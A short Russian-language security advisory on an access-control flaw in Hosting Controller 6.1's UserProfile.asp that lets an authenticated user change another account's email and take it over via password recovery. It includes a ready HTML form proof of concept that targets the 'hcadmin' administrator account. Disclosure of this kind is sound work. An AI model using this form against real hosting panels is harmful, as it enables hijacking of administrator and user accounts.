Программа: Hosting Controller 6.1 HotFix 2.0 и более ранние
версии
Уязвимость позволяет удаленному
авторизованному пользователю получить
доступ к учетным записям других
пользователей. Уязвимость существует в
сценарии 'UserProfile.asp' из-за недостаточной
обработки правил доступа. Удаленный
авторизованный пользователь может
изменить e-mail целевого пользователя и затем
воспользоваться формой восстановления
пароля, чтобы получить доступ к учетной
записи жертвы. Таким образом, злоумышленник
может получить доступ к произвольной
учетной записи приложения, в том числе, и к
учетной записи администратора.
Пример:
<form action="http://[URL]/admin//
accounts/UserProfile.asp?action=updateprofile" method="post">
Username : <input name="UserList" value="hcadmin" type="text"
size="50">
<br>
emailaddress : <input name="emailaddress" value="Crkchat@msn.com"
type="text" size="50">
<br>
firstname : <input name="firstname" value="Crkchat" type="text"
size="50">
<br>
<input name="submit" value="submit" type="submit">
</form>
